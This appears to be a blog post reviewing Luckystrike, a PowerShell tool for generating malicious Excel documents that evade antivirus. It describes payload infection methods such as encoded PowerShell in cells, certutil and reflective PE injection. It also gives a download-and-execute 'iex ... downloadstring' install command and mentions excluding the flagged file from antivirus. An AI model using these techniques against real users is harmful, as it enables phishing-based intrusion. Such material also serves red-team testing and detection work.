Close on the heels of my earlier post about MicroSploit, the Microsoft Office Exploitation Toolkit, that was on the *NIX platform, this post is about Luckystrike, a malicious Microsoft Office malicious document generator on Microsoft’s very own Windows platform.
What is Luckystrike?
Luckystrike is an open source script that helps you create malicious Microsoft Office documents using PowerShell’s ability to interface with COM objects. As of now, it only supports malicious Excel file (.xls) – 97-2003 format creation. The main focus is on getting your payloads through while evading anti-viruses.
The author is working on adding support for Microsoft Word files. Luckystrike was designed to be flexible and be easy to operate for inexperienced users as well. The script also auto-updates itself.
At the backend, we have a SQLite database providing a self-contained and persistent way to retrieve and embed them into documents with ease. It also stores code blocks, dependency rules, and infection methods. It can be easily shared between your team members whenever required. You can embed standard shell commands, custom PowerShell scripts, or even executable files (.exe) as payloads. These payloads are then stored in the SQLite database file that can be used repeatedly. If you want to be really sure that your code executes, you can infect a document with multiple payloads of different infection types too! The problem that I faced when trying to use this script was that on installation, my AV caught the file as malicious. After adding it to exclusions, I was able to execute it. The first time thought I was a bit confused reading about 5 options – catalog, payload, template and infection type. This explains what all these mean:
- Payload – A command, PowerShell script, or executable to be executed on the target machine.
- Catalog – A SQLite database containing saved payloads.
- Infection Type – The means by which to launch a payload on a target system.
- Template – A .xls file that is saved in the database to be used for generating a new, infected file.
Currently supported infection types are:
- Shell Command – Uses Wscript.Shell to fire the command exactly as is in a hidden window. Be sure your escapes are correct.
- Cell Embed – Your “go to” for firing PowerShell scripts. Base64 encodes .ps1 payload then embeds into cells. Macro concatenates then fires directly with PowerShell. Payload does not touch disk.
- Cell Embed-nonB64 – Embeds .ps1 into cells (no b64). Does NOT save payload to disk. Fires directly with powershell.exe.
- Cell Embed-Encrypted – Embeds RC4 encrypted .ps1 into cells (no b64). Does NOT save payload to disk. Key is the user’s email domain (retrieved from AD). Fired directly with powershell.exe. Careful to escape properly.
- Certutil – Saves base64 encoded .exe to a text file and then uses certutil to execute it.
- Save To Disk – Saves exe to disk (%APPDATA%) then fires.
- ReflectivePE – Saves b64 encoded PE as a text file then uses Invoke-ReflectivePEInjection to fire it.
- Metadata – Saves your shell command to the `Subject` field of the metadata. Good for empire stagers! Unfortunately, you can include only one metadata at a time.
All in all, this looks like a good start. Can’t wait for future releases as this tool looks promising!
The installation script takes care of everything for you. All you need is a Microsoft Windows system with PowerShell v5 and the PSSQLite module. Even if it does not exist, the script takes care of it. All you need to do is run the following command from an elevated PowerShell prompt:
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Shellntel/luckystrike/master/install.ps1')
Detailed instructions and the source code for luckystrike.ps1 can be found here.